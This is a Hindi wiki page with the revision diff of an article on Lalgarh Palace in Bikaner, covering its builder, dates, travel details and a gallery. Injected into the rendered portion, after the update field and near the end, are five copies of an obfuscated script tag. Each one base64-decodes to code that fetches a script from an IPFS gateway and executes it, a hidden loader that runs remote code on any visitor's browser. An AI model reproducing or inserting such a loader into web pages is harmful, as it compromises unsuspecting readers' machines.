Difference between revisions of "लाल गढ़ महल बीकानेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
[[चित्र:Lalgarh-Palace-Bikaner.jpg|thumb|लाल गढ़ महल, [[बीकानेर]]]]
+
{{सूचना बक्सा पर्यटन
 +
|चित्र=Lalgarh-Palace-Bikaner-2.jpg
 +
|चित्र का नाम=लाल गढ़ महल, बीकानेर
 +
|विवरण= महाराजा [[गंगा सिंह]] द्वारा अपने पिता महाराजा लाल सिंह की याद में निर्मित लाल बलुए पत्थर से बना यह महल वास्तुशिल्प का एक बेजोड़ नमूना है।
 +
|राज्य=[[राजस्थान]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[बीकानेर ज़िला|बीकानेर]]
 +
|निर्माता= महाराजा [[गंगा सिंह]]
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=1902 से 1926
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|कैसे पहुँचें=हवाई जहाज़, रेल, बस आदि से पहुँचा जा सकता है।
 +
|हवाई अड्डा=नाल हवाई अड्डा
 +
|रेलवे स्टेशन=बीकानेर रेलवे स्टेशन
 +
|बस अड्डा=बस अड्डा बीकानेर
 +
|यातायात=ऑटो रिक्शा, सिटी बस
 +
|क्या देखें= खिले हुए बोगनवेलियाँ व नाचते हुए बगीचे देखने योग्य है।
 +
|कहाँ ठहरें=होटल, धर्मशाला, अतिथि ग्रह
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=0151
 +
|ए.टी.एम=लगभग सभी
 +
|सावधानी=
 +
|मानचित्र लिंक=[http://maps.google.co.in/maps?saddr=Lalgarh+Palace,+Bikaner,+Rajasthan&daddr=Bikaner+Junction+Railway+Station,+Station+Road,+Bikaner,+Rajasthan&hl=en&sll=28.026985,73.324986&sspn=0.070764,0.110378&geocode=FSncqwEd5vBeBCHZA2QP2Lj9bQ%3BFfh0qwEdBrleBCkfA0_Gfd0_OTGQaszRE5SEgw&vpsrc=0&mra=ls&t=m&z=14 गूगल मानचित्र]
 +
|संबंधित लेख=[[जूनागढ़ क़िला बीकानेर|जूनागढ़ क़िला]], [[बीकानेर का क़िला]], [[सूरज पोल या सूर्य द्वार बीकानेर|सूरज पोल या सूर्य द्वार]], [[करणीमाता का मंदिर बीकानेर|करणीमाता का मंदिर]], [[गंगा गोल्डन जुबली संग्रहालय बीकानेर|गंगा गोल्डन जुबली संग्रहालय]]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=महल का कुछ हिस्सा एक हेरिटेज होटल व एक संग्रहालय में बदल दिया गया है जो श्री सार्दुल संग्रहालय के नाम से प्रसिद्ध है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन= {{अद्यतन|14:39, 10 दिसम्बर 2011 (IST)}}
 +
}}
 +
 
 
'''लाल गढ़ महल''' [[राजस्थान]] [[राज्य]] के [[बीकानेर]] शहर में स्थित है। महाराजा [[गंगा सिंह]] द्वारा अपने पिता महाराजा लाल सिंह की याद में निर्मित लाल बलुए पत्थर से बना यह महल वास्तुशिल्प का एक बेजोड़ नमूना है। महल के आर्कषण जाली का जरदोजी का काम हुआ है। खिले हुए बोगनवेलियाँ व नाचते हुए बगीचे देखने योग्य है। महल का कुछ हिस्सा एक हेरिटेज होटल व एक संग्रहालय में बदल दिया गया है जो श्री सार्दुल संग्रहालय के नाम से प्रसिद्ध है। संग्रहालय महल के समूचे प्रथम तल में बना हुआ है और इनमें सुरक्षित पुराने चित्र व वन्य जीवन की निशानियाँ संग्रहीत है।
 
'''लाल गढ़ महल''' [[राजस्थान]] [[राज्य]] के [[बीकानेर]] शहर में स्थित है। महाराजा [[गंगा सिंह]] द्वारा अपने पिता महाराजा लाल सिंह की याद में निर्मित लाल बलुए पत्थर से बना यह महल वास्तुशिल्प का एक बेजोड़ नमूना है। महल के आर्कषण जाली का जरदोजी का काम हुआ है। खिले हुए बोगनवेलियाँ व नाचते हुए बगीचे देखने योग्य है। महल का कुछ हिस्सा एक हेरिटेज होटल व एक संग्रहालय में बदल दिया गया है जो श्री सार्दुल संग्रहालय के नाम से प्रसिद्ध है। संग्रहालय महल के समूचे प्रथम तल में बना हुआ है और इनमें सुरक्षित पुराने चित्र व वन्य जीवन की निशानियाँ संग्रहीत है।
{{प्रचार}}
+
[[चित्र:Lalgarh-Palace-Bikaner-5.jpg|thumb|left|लाल गढ़ महल [[बीकानेर]]]]
{{लेख प्रगति  
+
[[चित्र:Lalgarh-Palace-Bikaner-4.jpg|thumb|left|लाल गढ़ महल [[बीकानेर]]]]
|आधार=
+
 
|प्रारम्भिक= प्रारम्भिक1
+
{{लेख प्रगति |आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
|माध्यमिक=  
+
==वीथिका==
|पूर्णता=  
+
<gallery>
|शोध=
+
चित्र:Lalgarh-Palace-Bikaner-3.jpg|लाल गढ़ महल, [[बीकानेर]]
}}
+
चित्र:Lalgarh-Palace-Bikaner.jpg|लाल गढ़ महल, [[बीकानेर]] (1900)
 +
चित्र:Lalgarh-Palace-Bikaner-1.jpg|लाल गढ़ महल, [[बीकानेर]] (1900)
 +
</gallery>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
 
{{भारत के दुर्ग}}
 
{{भारत के दुर्ग}}
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]][[Category:बीकानेर]][[Category:बीकानेर_के_पर्यटन_स्थल]]__INDEX__
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]][[Category:बीकानेर]][[Category:बीकानेर_के_पर्यटन_स्थल]]__INDEX__

Latest revision as of 09:37, 30 September 2016

lal gadh mahal bikaner
vivaran maharaja ganga sianh dvara apane pita maharaja lal sianh ki yad mean nirmit lal balue patthar se bana yah mahal vastushilp ka ek bejo d namoona hai.
rajy rajasthan
zila bikaner
nirmata maharaja ganga sianh
sthapana 1902 se 1926
kaise pahuanchean havaee jahaz, rel, bas adi se pahuancha ja sakata hai.
havaee adda nal havaee adda
relave steshan bikaner relave steshan
bas adda bas adda bikaner
yatayat aauto riksha, siti bas
kya dekhean khile hue boganaveliyaan v nachate hue bagiche dekhane yogy hai.
kahaan thaharean hotal, dharmashala, atithi grah
es.ti.di. kod 0151
e.ti.em lagabhag sabhi
chitr:Map-icon.gif googal manachitr
sanbandhit lekh joonagadh qila, bikaner ka qila, sooraj pol ya soory dvar, karanimata ka mandir, ganga goldan jubali sangrahalay


any janakari mahal ka kuchh hissa ek heritej hotal v ek sangrahalay mean badal diya gaya hai jo shri sardul sangrahalay ke nam se prasiddh hai.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

lal gadh mahal rajasthan rajy ke bikaner shahar mean sthit hai. maharaja ganga sianh dvara apane pita maharaja lal sianh ki yad mean nirmit lal balue patthar se bana yah mahal vastushilp ka ek bejo d namoona hai. mahal ke arkashan jali ka jaradoji ka kam hua hai. khile hue boganaveliyaan v nachate hue bagiche dekhane yogy hai. mahal ka kuchh hissa ek heritej hotal v ek sangrahalay mean badal diya gaya hai jo shri sardul sangrahalay ke nam se prasiddh hai. sangrahalay mahal ke samooche pratham tal mean bana hua hai aur inamean surakshit purane chitr v vany jivan ki nishaniyaan sangrahit hai. [[chitr:Lalgarh-Palace-Bikaner-5.jpg|thumb|left|lal gadh mahal bikaner]] [[chitr:Lalgarh-Palace-Bikaner-4.jpg|thumb|left|lal gadh mahal bikaner]]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>